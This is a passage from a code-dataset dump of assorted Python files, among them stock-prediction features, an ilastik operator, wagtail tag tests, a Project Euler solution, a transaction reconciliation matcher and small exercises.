dataset['pivL1']\n\n dataset['close/pivH2'] = dataset['Last'] / dataset['pivH2']\n\n dataset['close/pivL2'] = dataset['Last'] / dataset['pivL2']\n\n\n dataset['close/pivH3'] = dataset['Last'] / dataset['pivH3']\n dataset['close/pivL3'] = dataset['Last'] / dataset['pivL3']\n\n dataset['pivL1/pivH1'] = dataset['pivL1'] / dataset['pivH1']\n dataset['pivL2/pivH2'] = dataset['pivL2'] / dataset['pivH2']\n\n dataset['high/pivH1'] = dataset['High'] / dataset['pivH1']\n dataset['low/pivH1'] = dataset['Low'] / dataset['pivH1']\n dataset['high/pivL1'] = dataset['High'] / dataset['pivL1']\n\n\n dataset['low/pivL1'] = dataset['Low'] / dataset['pivL1']\n\n dataset['close/prevClose'] = dataset['Last'] / dataset['Last'].shift(1)\n\n # Below are the things we are interested in predicting:\n\n 
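    # next_candle_size: absolute size of the next bar's move, relative to the current close\n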
    dataset['next_candle_size'] = abs(dataset['Last'].shift(-1) - dataset['Last']) / dataset['Last']\n\n    # next_candle_color is 1 when the next close is higher and -1 otherwise (two classes, not 0/1)\n\n    dataset['next_candle_color'] = np.where(dataset['Last'].shift(-1) > dataset['Last'], 1, -1)\n\n    #data = dataset[['Date', 'Mid', 'High', 'Low', 'Last', 'close/prevClose','low/pivL1', 'close/pivH3',\n    #       'close/pivH1', 'close/pivL2', 'close/pivL1', 'close/pivH2', 'high/pivL1', 'close/pivL3', \n    #       'low/pivH1', 'pivL2/pivH2', 'high/pivH1', 'next_candle_color', 'next_candle_size'\n    #      ]]\n\n    data = dataset[['Mid', 'High', 'Low', 'Last', 'close/prevClose','low/pivL1', 'close/pivH3',\n           'close/pivH1', 'close/pivL2', 'close/pivL1', 'close/pivH2', 'high/pivL1', 'close/pivL3', \n           'low/pivH1', 'pivL2/pivH2', 'high/pivH1', 'next_candle_color', 'next_candle_size'\n          ]]\n\n    data = data.dropna()\n\n\n    # XG Classify\n    training_data = data\n\n    df_xg = training_data\n\n    df_xg.dropna(axis=0, inplace=True)\n\n    X = df_xg.iloc[:,5:17]\n    y = df_xg.iloc[:,-2]\n\n    params = {\n        'objective': 'binary:logistic',\n        'max_depth': 2,\n        'learning_rate': 1,\n        'silent': 1,\n        'n_estimators': 5\n    }\n\n\n\n\n    #model_two = XGBClassifier(**params).fit(X, y)\n\n    #predictionDataset_xg = X.iloc[-1:]\n\n    #prediction_xg = model_two.predict(predictionDataset_xg)\n\n    #print('PRINT XG CLASSIFIER')\n    #print(prediction_xg)\n    ####################################\n\n    #try:\n    #    model = get_best_hmm_model(X = train_set, max_states = 10, max_iter = 1000000)\n    #except:\n    #    print('means weight')\n\n    #print(\"Best model with {0} states \".format(str(model.n_components)))\n\n    #plot_hidden_states(model, dataset.reset_index(), train_set, column_price)\n    #compare_hidden_states(hmm_model=model, cols_features=cols_features, conf_interval=0.95)\n\n\n\n    #predictionDataset = dataset.iloc[-1:]\n\n    #prediction = model.predict(predictionDataset[cols_features])\n\n    #print('SIRAJ CLASSIFIER')\n    # LOGIC SHORT WHEN 0; NO POSITION WHEN 1; LONG WHEN 2;\n    #print(len(prediction))\n    #print(sum(prediction))\n\n\n","sub_path":"Bet-folder/SANDP500.py","file_name":"SANDP500.py","file_ext":"py","file_size_in_byte":22526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"79151539","text":"from lazyflow.graph import Operator, InputSlot, OutputSlot\n\nfrom lazyflow.operators import OpPixelFeaturesPresmoothed, OpSlicedBlockedArrayCache, OpMultiArraySlicer2\n\nclass OpFeatureSelection(Operator):\n    \"\"\"\n    The top-level operator for the feature selection applet.\n    \"\"\"\n    name = \"OpFeatureSelection\"\n    category = \"Top-level\"\n\n    # Multiple input images\n    InputImage = InputSlot()\n\n    # The following input slots are applied uniformly to all input images\n    Scales = InputSlot() # The list of possible scales to use when computing features\n    FeatureIds = InputSlot() # The list of features to compute\n    SelectionMatrix = InputSlot() # A matrix of bools indicating which features to output.\n                         # The matrix rows correspond to feature types in the order specified by the FeatureIds input.\n                         # (See OpPixelFeaturesPresmoothed for the available feature types.)\n                         # The matrix columns correspond to the scales provided in the Scales input,\n                         # which requires that the number of matrix columns must match len(Scales.value)\n    \n    # Features are presented in the channels of the output image\n    # Output can be optionally accessed via an internal cache.\n    # (Training a classifier benefits from caching, but predicting with an existing classifier does 
not.)\n OutputImage = OutputSlot()\n CachedOutputImage = OutputSlot()\n\n FeatureLayers = OutputSlot(level=1) # For the GUI, we also provide each feature as a separate slot in this multislot\n \n def __init__(self, *args, **kwargs):\n super(OpFeatureSelection, self).__init__(*args, **kwargs)\n\n # Two internal operators: features and cache\n self.opPixelFeatures = OpPixelFeaturesPresmoothed(parent=self)\n self.opPixelFeatureCache = OpSlicedBlockedArrayCache(parent=self)\n self.opPixelFeatureCache.name = \"opPixelFeatureCache\"\n\n # Connect the cache to the feature output\n self.opPixelFeatureCache.Input.connect(self.opPixelFeatures.Output)\n self.opPixelFeatureCache.fixAtCurrent.setValue(False)\n\n # Connect our internal operators to our external inputs \n self.opPixelFeatures.Scales.connect( self.Scales )\n self.opPixelFeatures.FeatureIds.connect( self.FeatureIds )\n self.opPixelFeatures.Matrix.connect( self.SelectionMatrix )\n self.opPixelFeatures.Input.connect( self.InputImage )\n \n # Connect our external outputs to our internal operators\n self.OutputImage.connect( self.opPixelFeatures.Output )\n self.CachedOutputImage.connect( self.opPixelFeatureCache.Output )\n self.FeatureLayers.connect( self.opPixelFeatures.Features )\n\n def setupOutputs(self): \n # We choose block shapes that have only 1 channel because the channels may be \n # coming from different features (e.g different filters) and probably shouldn't be cached together.\n blockDimsX = { 't' : (1,1),\n 'z' : (128,256),\n 'y' : (128,256),\n 'x' : (32,32),\n 'c' : (1000,1000) } # Overestimate number of feature channels: Cache block dimensions will be clipped to the size of the actual feature image\n\n blockDimsY = { 't' : (1,1),\n 'z' : (128,256),\n 'y' : (32,32),\n 'x' : (128,256),\n 'c' : (1000,1000) }\n\n blockDimsZ = { 't' : (1,1),\n 'z' : (32,32),\n 'y' : (128,256),\n 'x' : (128,256),\n 'c' : (1000,1000) }\n \n axisOrder = [ tag.key for tag in self.InputImage.meta.axistags ]\n innerBlockShapeX = tuple( blockDimsX[k][0] for k in axisOrder )\n outerBlockShapeX = tuple( blockDimsX[k][1] for k in axisOrder )\n\n innerBlockShapeY = tuple( blockDimsY[k][0] for k in axisOrder )\n outerBlockShapeY = tuple( blockDimsY[k][1] for k in axisOrder )\n\n innerBlockShapeZ = tuple( blockDimsZ[k][0] for k in axisOrder )\n outerBlockShapeZ = tuple( blockDimsZ[k][1] for k in axisOrder )\n\n # Configure the cache \n self.opPixelFeatureCache.innerBlockShape.setValue( (innerBlockShapeX, innerBlockShapeY, innerBlockShapeZ) )\n self.opPixelFeatureCache.outerBlockShape.setValue( (outerBlockShapeX, outerBlockShapeY, outerBlockShapeZ) )\n\n\n def propagateDirty(self, slot, subindex, roi):\n # Output slots are directly connected to internal operators\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ilastik/applets/featureSelection/opFeatureSelection.py","file_name":"opFeatureSelection.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"413287819","text":"import pytest\n\nfrom tests.factories.tag import (\n TagFactory,\n tag_lazy_traceable,\n tag_lazy_analytical,\n tag_lazy_functional,\n tag_instant_traceable,\n tag_instant_analytical,\n tag_instant_functional,\n)\nfrom tests.factories.trigger import TriggerFactory, TriggerConditionFactory\nfrom tests.factories.constant import ConstantFactory\nfrom tests.factories.variable import VariableFactory\nfrom wagtail_tag_manager.models import (\n Tag,\n Trigger,\n Constant,\n Variable,\n 
TriggerCondition,\n)\n\n\ndef get_expected_content(string):\n return f''\n\n\n@pytest.mark.django_db\ndef test_tag_create():\n produced_tag = TagFactory()\n tag = Tag(\n name=\"functional instant\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_instant_functional():\n produced_tag = tag_instant_functional()\n tag = Tag(\n name=\"functional instant\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_instant_analytical():\n produced_tag = tag_instant_analytical()\n tag = Tag(\n name=\"analytical instant\",\n tag_type=\"analytical\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_instant_traceable():\n produced_tag = tag_instant_traceable()\n tag = Tag(\n name=\"traceable instant\",\n tag_type=\"traceable\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_lazy_functional():\n produced_tag = tag_lazy_functional()\n tag = Tag(\n name=\"functional lazy\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_lazy_analytical():\n produced_tag = tag_lazy_analytical()\n tag = Tag(\n name=\"analytical lazy\",\n tag_type=\"analytical\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_lazy_traceable():\n produced_tag = tag_lazy_traceable()\n tag = Tag(\n name=\"traceable lazy\",\n tag_type=\"traceable\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_constant_create():\n produced_constant = ConstantFactory()\n constant = Constant(name=\"Constant\", key=\"key\", value=\"value\")\n\n assert produced_constant.name == constant.name\n assert produced_constant.key == constant.key\n assert produced_constant.value == constant.value\n\n\n@pytest.mark.django_db\ndef test_variable_create():\n produced_variable = VariableFactory()\n variable = Variable(\n name=\"Variable\", key=\"key\", variable_type=\"_cookie+\", value=\"wtm\"\n )\n\n assert produced_variable.name == variable.name\n assert produced_variable.key == variable.key\n assert produced_variable.variable_type == variable.variable_type\n assert produced_variable.value == variable.value\n\n\n@pytest.mark.django_db\ndef test_trigger_create():\n produced_trigger = TriggerFactory()\n trigger = Trigger(name=\"Trigger\")\n\n assert produced_trigger.name == trigger.name\n\n\n@pytest.mark.django_db\ndef test_trigger_condition_create():\n produced_trigger = TriggerFactory()\n produced_trigger_condition = TriggerConditionFactory(trigger=produced_trigger)\n trigger = Trigger(name=\"Trigger\")\n trigger_condition = TriggerCondition(\n 
variable=\"navigation_path\", value=\"/\", trigger=trigger\n )\n\n assert produced_trigger.name == trigger.name\n assert produced_trigger_condition.value == trigger_condition.value\n","sub_path":"tests/unit/test_factories.py","file_name":"test_factories.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"472449696","text":"# By replacing the 1st digit of the 2-digit number *3, \n# it turns out that six of the nine possible values: 13, 23, 43, 53, 73, and 83, are all prime.\n\n# By replacing the 3rd and 4th digits of 56**3 with the same digit, \n# this 5-digit number is the first example having seven primes among the ten \n# generated numbers, yielding the family: 56003, 56113, 56333, 56443, 56663, 56773, \n# and 56993. Consequently 56003, being the first member of this family, is the smallest prime \n# with this property.\n\n# Find the smallest prime which, by replacing part of the number \n# (not necessarily adjacent digits) with the same digit, \n# is part of an eight prime value family.\n\n############\n# Solution #\n############\n\n# Stupid solution incoming!\n\nimport math\n\ndef genPatternsRecursive(patterns, base, length):\n\tif len(base) == length:\n\t\treturn\n\tnew_base_a = base[:] + \"*\"\n\tnew_base_b = base[:] + \"_\"\n\tif len(new_base_a) == length:\n\t\tpatterns.append(new_base_a)\n\t\tpatterns.append(new_base_b)\n\t\treturn\n\telse:\n\t\tgenPatternsRecursive(patterns, new_base_a, length)\n\t\tgenPatternsRecursive(patterns, new_base_b, length)\n\n# Generates a list of patterns of the form \"_**_\" or \"*_*_*_\"\n# of a given length\ndef genPatterns(length):\n\tbase = \"\"\n\tpatterns = []\n\tgenPatternsRecursive(patterns, base, length)\n\treturn patterns\n\n# Takes a pattern (e.g. \"_**_\") and a list of digits\n# (e.g. [1, 2, 2, 3]), and returns true if the stars\n# in the pattern are occupied by the same digit.\n# Also return a code to identify the family (e.g. 
\"1**3\" reversed)\ndef patternMatch(pattern, digits):\n\treplacement = -1\n\tcode = \"\"\n\tfor i in range(len(digits)):\n\t\tif pattern[i] == '_':\n\t\t\tcode += str(digits[i])\n\t\t\tcontinue\n\t\tcode += '*'\n\t\tif replacement == -1:\n\t\t\treplacement = digits[i]\n\t\telif digits[i] != replacement:\n\t\t\treturn (False, \"\")\n\treturn (True, code)\n\ndef getDigits(n):\n\tdigits = []\n\twhile n > 0:\n\t\tdigits.append(n % 10)\n\t\tn = n // 10\n\treturn digits\n\ndef isPrime(n):\n\t# Ignore multiples of two\n\tfor i in range(3, int(math.sqrt(n)) + 1, 2):\n\t\tif n % i == 0:\n\t\t\treturn False\n\treturn True\n\n# Generate patterns for i-digit numbers\nfamilies = []\nfor i in range(1, 8):\n\tfamilies.append(genPatterns(i))\n\n# Go through each prime, find out what families it belongs to,\n# and add one to each family's score\nscores = {}\nfor n in range(3, 1000000, 2):\n\tif not isPrime(n):\n\t\tcontinue\n\tdigits = getDigits(n)\n\tpatterns = families[len(digits) - 1]\n\tfor pattern in patterns:\n\t\tmatch, code = patternMatch(pattern, digits)\n\t\tif match:\n\t\t\tif code in scores:\n\t\t\t\tscores[code][1] += 1 # increment the score\n\t\t\telse:\n\t\t\t\tscores[code] = [n, 1] # n was the first prime\n\n# Find the first family with a score >= 8\nfor code, (first, score) in scores.items():\n\tif score >= 8:\n\t\tprint(first)\n\t\tbreak","sub_path":"problem51.py","file_name":"problem51.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"573075743","text":"import pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\ndef get_contract_data(contract):\n plot_dict = {}\n plot_dict['axaie'] = [50.0,60.0,150.0]\n plot_dict['autoline'] = [1000.0,200.0,150.0]\n return plot_dict[contract]\ndef get_percentile(x):\n percentile_dict = {}\n x.sort()\n n = len(x)\n percentile = 0.95\n x_95_percentile = int(percentile*n + 0.5)\n median = int(0.5*n + 0.5)\n q1 = int(0.25*n + 0.5)\n q3 = int(0.75*n + 0.5)\n x_5 = int(0.05*n+0.5)\n x_10 = int(0.1*n+0.5)\n x_90 = int(0.9*n+0.5)\n percentile_dict['95'] = x[x_95_percentile]\n percentile_dict['50'] = x[median]\n percentile_dict['25'] = x[q1]\n percentile_dict['75'] = x[q3]\n percentile_dict['5'] = x[x_5]\n percentile_dict['10'] = x[x_10]\n percentile_dict['90'] = x[x_90]\n return percentile_dict \ndef get_data(sav_file):\n pkl_file = open(sav_file, 'rb')\n data = pickle.load(pkl_file)\n return data\n\ndef get_differences(old,new):\n data = {}\n for subid in old:\n if subid in new:\n for h in [7,28,90]:\n if len(new[subid][h])*len(old[subid][h])!= 0:\n if subid not in data:\n data[subid] = {}\n if str(new[subid][h][0])!=\"nan\":\n data[subid][h] = (float(new[subid][h][0])-float(old[subid][h][0]))\n result = {}\n for subid in data:\n for h in data[subid]:\n if h not in result:\n result[h] = []\n result[h].append(data[subid][h])\n return result \ndef plot_data(plotting_subid):\n contract = 'axaie'\n min_var1 = -100.0\n max_var1 = 100.0\n plotting_text = get_contract_data(contract)\n counter = 1\n numbins = np.arange(min_var1,max_var1,(max_var1-min_var1)/200.0 ) \n for days_of_chaining in [7,28,90]:\n plot_data = plotting_subid[days_of_chaining]\n number_of_drivers = len(plot_data)\n median = get_percentile(np.array(plot_data))\n plt.subplot(3,1,counter)\n if counter==1:\n plt.title('Lifesense analysis for 7,28,90 days chaining')\n plt.hist(plot_data,bins=numbins,color='c',label=\"{0}-days chaining\".format(days_of_chaining))\n plt.axvline(median['5'], 
color='b', linestyle='dashed', linewidth=2)\n plt.text(median['5'],plotting_text[counter-1],'95%:{0}'.format(round(median['5'],2)),rotation=90)\n plt.axvline(median['10'], color='r', linestyle='dashed', linewidth=2)\n plt.text(median['10'],plotting_text[counter-1],'90%:{0}'.format(round(median['10'],2)),rotation=90)\n plt.xlim(min_var1,max_var1)\n plt.xlabel('%Chaining_distance')\n plt.ylabel('Count')\n plt.legend(loc=0)\n counter+=1\n\n plt.show()\n\nsav_file_old_method = '../sav_files/score_correlation/axaie_percentagese_for_correlation_with_production.sav'\nsav_file_new_method = '../sav_files/score_correlation/axaie_percentagese_for_correlation_with_production_new.sav'\n\nold = get_data(sav_file_old_method)\nnew = get_data(sav_file_new_method)\ndata = get_differences(old,new)\nplot_data(data)","sub_path":"mydrive_python/Lifesense_data_analysis/code/analysis_percentage_changes_between_methods.py","file_name":"analysis_percentage_changes_between_methods.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"43180745","text":"import pandas as pd\nimport numpy as np\nimport re #delimiter\nimport datetime\nimport math\nimport json\n\nNUM_BEST_MATCHES = 3\n\nUSERNAME_WEIGHT = 0.2\nAMOUNT_WEIGHT = 0.3\nDATE_WEIGHT = 0.5\nTHRESHOLD = 75\n\nclass Categorise: \n def __init__(self, fundHistory, bankExport, folder):\n self.folder = folder + '/'\n self.a = pd.read_csv(self.folder + fundHistory)\n self.b = pd.read_csv(self.folder + bankExport)\n self.result = 0\n\n if (len(self.a.columns) == 7) and (len(self.b.columns) == 11):\n #create blank dataframe with username/matchRate columns and with number of rows equal to how many rows are in df1\n self.data = pd.DataFrame(columns=('Row #', 'Username', 'Amount', 'Match Rate (%)', 'Status', 'Manual Status'), index=range(0, len(self.a)))\n self.bestMatches = pd.DataFrame(columns=('Row #', 'Matching Row #', 'Username', 'Amount', 'Match Rate (%)'), index=range(0, len(self.a) * NUM_BEST_MATCHES))\n else:\n self.data = pd.DataFrame(columns=('Row #', 'Username', 'Amount', 'Match Rate (%)', 'Status', 'Manual Status'), index=range(0, len(self.b)))\n self.bestMatches = pd.DataFrame(columns=('Row #','Matching Row #', 'Username', 'Amount', 'Match Rate (%)'), index=range(0, len(self.b) * NUM_BEST_MATCHES))\n\n #rather than addressing columns by names, we can address each column by location, for example bankExport[bankExport.columns[1]]\n #will access data in column index 1\n \n #####################################################################\n #fundHistory map: index 1 - username, index 3 - amount, index 5 - date\n #bankExport map: index 1 - date, index 3 - name, index 5/6 - amount sent/received\n ####################################################################2#\n\n def run(self):\n if (len(self.a.columns) == 7) and (len(self.b.columns) == 11):\n return self.cmp(self.a, self.b)\n else:\n return self.cmp(self.b, self.a)\n\n def cmpUserNames(self, userName1, userName2):\n if type(userName2) is type(0.0):\n return 0\n string1 = userName1\n string2 = userName2.split()\n percent = 100/len(string1)\n value = 0\n for i in string2:\n temp = 0\n for j in string1:\n for k in i:\n if(j.lower() == k.lower()):\n temp = temp + percent\n break\n if(temp > value):\n value = temp \n return value\n \n def cmpDates(self, date1, date2):\n dic = {0:100, 1:80, 2:80,3:80, 4:60, 5:60, 6:40, 7:40, 8:10}# Can be used to hold and easily display the percentages for certain time periods\n x = 
date1.split()#splitting dates into day, month, year\r\n        x = x[0].split(\"/\")\r\n        if(int(x[2]) < 2000):\r\n            x[2] = str(int(x[2])+2000)\r\n        y = (date2.split(\"/\"))\r\n        if (len(y) > 2):\r\n            diff = datetime.date(int(y[2]),int(y[1]), int(y[0])) - datetime.date(int(x[2]),int(x[1]), int(x[0]))# dates are then switched to year, month, day\r\n\r\n            if (diff == datetime.timedelta(0)):#dates are equal\r\n                return dic[0]\r\n\r\n            elif (diff == datetime.timedelta(1) or diff == datetime.timedelta(2) or diff == datetime.timedelta(3)):#1-3 days\r\n                return dic[1]\r\n\r\n            elif (diff == datetime.timedelta(4) or diff == datetime.timedelta(5)):#4-5\r\n                return dic[4]\r\n\r\n            elif (diff == datetime.timedelta(6) or diff == datetime.timedelta(7)):#6-7\r\n                return dic[6]\r\n\r\n            elif (diff > datetime.timedelta(7)):#7+\r\n                return dic[8]\r\n            else:\r\n                return 0 #the dates have been wrongly entered\r\n        else:\r\n            return 0\r\n    #need to make values of the same type, as values coming from the csv files are either ints, floats or strings\r\n    #in this case, I remove commas and convert the remaining strings to floats\r\n    def cmpAmount(self, amount1, amount2):\r\n        temp1 = float(str(amount1).replace(',', ''))\r\n        temp2 = float(str(amount2).replace(',', ''))\r\n        if(temp1 == temp2):\r\n            return 100\r\n        else:\r\n            return 0\r\n\r\n    def getDataFrame1(self):\r\n        return self.data.to_json(orient=\"records\");\r\n\r\n    def getDataFrame2(self,id):\r\n        r = []\r\n        result = self.bestMatches.to_json(orient=\"records\");\r\n        for i in json.loads(result):\r\n            if int(i['Row #']) == int(id):\r\n                r.append(i)\r\n\r\n        return json.dumps(r)\r\n\r\n    def getConfidence(self):\r\n        return self.result\r\n\r\n    #run all comparison methods on the data passed in\r\n    def cmp(self, df1, df2):\r\n\r\n        confidence = 0\r\n        matchedDic = {}\r\n        for i in range(0, len(df1)):\r\n            matchRate = 0\r\n            matchRates = list()\r\n            topRow = 0\r\n            for j in range(0, len(df2)):\r\n                temp = 0\r\n                tempAmount = 0\r\n                if not df2.loc[j][1] == \"End of File\":\r\n                    temp = temp + self.cmpUserNames(df1.loc[i][1], df2.loc[j][3]) * USERNAME_WEIGHT\r\n\r\n                    #isnan is a function provided by numpy library. 
It checks if the value is NaN(null)\n if not np.isnan(df2.loc[j][5]):\n temp = temp + self.cmpAmount(df1.loc[i][3], df2.loc[j][5]) * AMOUNT_WEIGHT\n tempNum = 5\n elif not np.isnan(df2.loc[j][6]):\n temp = temp + self.cmpAmount(df1.loc[i][3], df2.loc[j][6]) * AMOUNT_WEIGHT\n tempNum = 6\n \n if temp > 20:\n temp = temp + self.cmpDates(df1.loc[i][5], df2.loc[j][1]) * DATE_WEIGHT\n \n if not j in matchedDic:\n if(temp > matchRate):\n matchRate = int(math.ceil(temp))\n topRow = j\n \n #tuple (row number of bank export, match rate, column number with amount)\n matchRates.append((j, int(math.ceil(temp)), tempNum))\n \n matchedDic[j] = j\n matchRates = sorted(matchRates, key=lambda matches: matches[1])\n tuple1 = matchRates[-1]\n tuple2 = matchRates[-2]\n tuple3 = matchRates[-3]\n \n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Row #'] = i\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Matching Row #'] = tuple1[0] + 1\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Username'] = df2.loc[tuple1[0]][3]\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Amount'] = df2.loc[tuple1[0]][tuple1[2]]\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Match Rate (%)'] = tuple1[1]\n \n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Row #'] = i\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Matching Row #'] = tuple2[0] + 1\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Username'] = df2.loc[tuple2[0]][3]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Amount'] = df2.loc[tuple2[0]][tuple2[2]]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Match Rate (%)'] = tuple2[1]\n \n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Row #'] = i\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Matching Row #'] = tuple3[0] + 1\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Username'] = df2.loc[tuple3[0]][3]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Amount'] = df2.loc[tuple3[0]][tuple3[2]]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Match Rate (%)'] = tuple3[1]\n \n self.data.loc[i]['Row #'] = i + 1\n self.data.loc[i]['Username'] = df1.loc[i][1]\n self.data.loc[i]['Amount'] = df1.loc[i][3]\n self.data.loc[i]['Match Rate (%)'] = matchRate\n if matchRate >= THRESHOLD:\n self.data.loc[i]['Status'] = 'done'\n else:\n self.data.loc[i]['Status'] = 'refused'\n self.data.loc[i]['Manual Status'] = df1.loc[i][4]\n\n if self.data.loc[i]['Status'] == self.data.loc[i]['Manual Status']:\n confidence += 1\n\n self.result = float(confidence) / float((len(df1) - 1))\n self.result *= 100\n self.result = float(\"{0:.2f}\".format(self.result))\n\n \n","sub_path":"grid_reconciliation_tool/reconciliation_tool/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"65038026","text":"def isBalanced(s):\n stack = []\n l = len(s)\n for i in range(0, l):\n if s[i] == '{' or s[i] == '[' or s[i] == '(':\n stack.append(s[i])\n if s[i] == ')':\n x = stack.pop()\n print(x)\n if x == '{' or x == '[':\n print('False')\n else:\n print('true')\n elif s[i] == '}':\n x = stack.pop()\n if x == '(' or x == '[':\n print('False')\n else:\n print('True')\n elif s[i] == ']':\n x = stack.pop()\n if x == '{' or x == '(':\n print('False')\n else:\n print('True')\n\ns = '()'\nprint(s)\nisBalanced(s)\n","sub_path":"balancedparenthesis.py","file_name":"balancedparenthesis.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"190206289","text":"import xgboost as xgb\nfrom sklearn import 
cross_validation\nimport numpy as np\nimport csv\ndata=[]\nmark=[]\nauc=[]\nacc=[]\nwith open('/Users/hhy/Desktop/test/data.csv','r',encoding='utf-8_sig') as f:\n    csv_reader=csv.reader(f)\n    for x in csv_reader:\n        data.append(list(map(float,x[0:-1])))\n        mark.append(float(x[-1]))\ndata=np.array(data)\nmark=np.array(mark)\nfor i in range(5):\n    X_train, X_test, y_train, y_test = cross_validation.train_test_split(\n        data, mark, test_size=0.05,random_state=i)\n    dtrain=xgb.DMatrix(X_train,label=y_train)\n    dtest=xgb.DMatrix(X_test)\n    params={'booster':'gblinear',\n            'nthread':4,\n            'seed':1113,\n            'silent': 0}\n    model=xgb.train(params,dtrain,num_boost_round=1900)\n    ypred=model.predict(dtest)\n    y_pred=(ypred>=0.5)*1\n    from sklearn import metrics\n    print ('ACC: %.4f' % metrics.accuracy_score(y_test,y_pred))\n    acc.append(metrics.accuracy_score(y_test,y_pred))\n    print ('AUC: %.4f' % metrics.roc_auc_score(y_test,ypred))\n    auc.append(metrics.roc_auc_score(y_test,ypred))\n    #print ('Recall: %.4f' % metrics.recall_score(y_test,y_pred))\n    #print ('F1-score: %.4f' %metrics.f1_score(y_test,y_pred))\nprint('acc',sum(acc)/len(acc))\nprint('auc',sum(auc)/len(auc))\n'''auc 0.887654252238\nacc 0.808695652174'''","sub_path":"Graduation/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"232639386","text":"def replace_string_letters(string, index1, index2):\n    helper_arr = []\n    for char in string:\n        helper_arr.append(char)\n\n    temp = helper_arr[index2]\n    helper_arr[index2] = helper_arr[index1]\n    helper_arr[index1] = temp\n    \n    replaced_string = \"\"\n    for char in helper_arr:\n        replaced_string += char\n\n    return replaced_string\n\ndef encrypt(word, key):\n    encrypted_word = word\n    n = len(key)\n\n    for i in range(0, len(word)):\n        encrypted_word = replace_string_letters(encrypted_word, i, key[i % n] - 1)\n\n    return encrypted_word\n\nwords = []\nkey = []\nwith open(\"szyfr1.txt\") as txt_file:\n    lines = []\n    for i, line in enumerate(txt_file):\n        lines.append(line.strip())\n    for word in lines[:-1]:\n        words.append(word)\n    key_line_str_nums = lines[-1].split()\n    for str_num in key_line_str_nums:\n        key.append(int(str_num))\n\nfor word in words:\n    encrypted_word = encrypt(word, key)\n    print(encrypted_word)","sub_path":"zbior/76/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"2661682","text":"# -*- coding: utf-8 -*-\r\n#prediction using model.\r\n#process--->1.load data(X:list of int,y:int). 2.create session. 3.feed data. 
4.predict\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom a07_Transformer import Transformer\r\nfrom data_util_zhihu import load_data_predict,load_final_test_data,create_voabulary,create_voabulary_label\r\nfrom tflearn.data_utils import pad_sequences #to_categorical\r\nimport os\r\nimport codecs\r\n\r\n#configuration\r\nFLAGS=tf.app.flags.FLAGS\r\ntf.app.flags.DEFINE_integer(\"num_classes\",1999+3,\"number of label\") #3 ADDITIONAL TOKEN: _GO,_END,_PAD\r\ntf.app.flags.DEFINE_float(\"learning_rate\",0.01,\"learning rate\")\r\ntf.app.flags.DEFINE_integer(\"batch_size\", 128, \"Batch size for training/evaluating.\") #batch size 32-->128 #16\r\ntf.app.flags.DEFINE_integer(\"decay_steps\", 6000, \"how many steps before decay learning rate.\") #6000; batch size 32-->128\r\ntf.app.flags.DEFINE_float(\"decay_rate\", 1.0, \"Rate of decay for learning rate.\") #0.87; how much to decay each 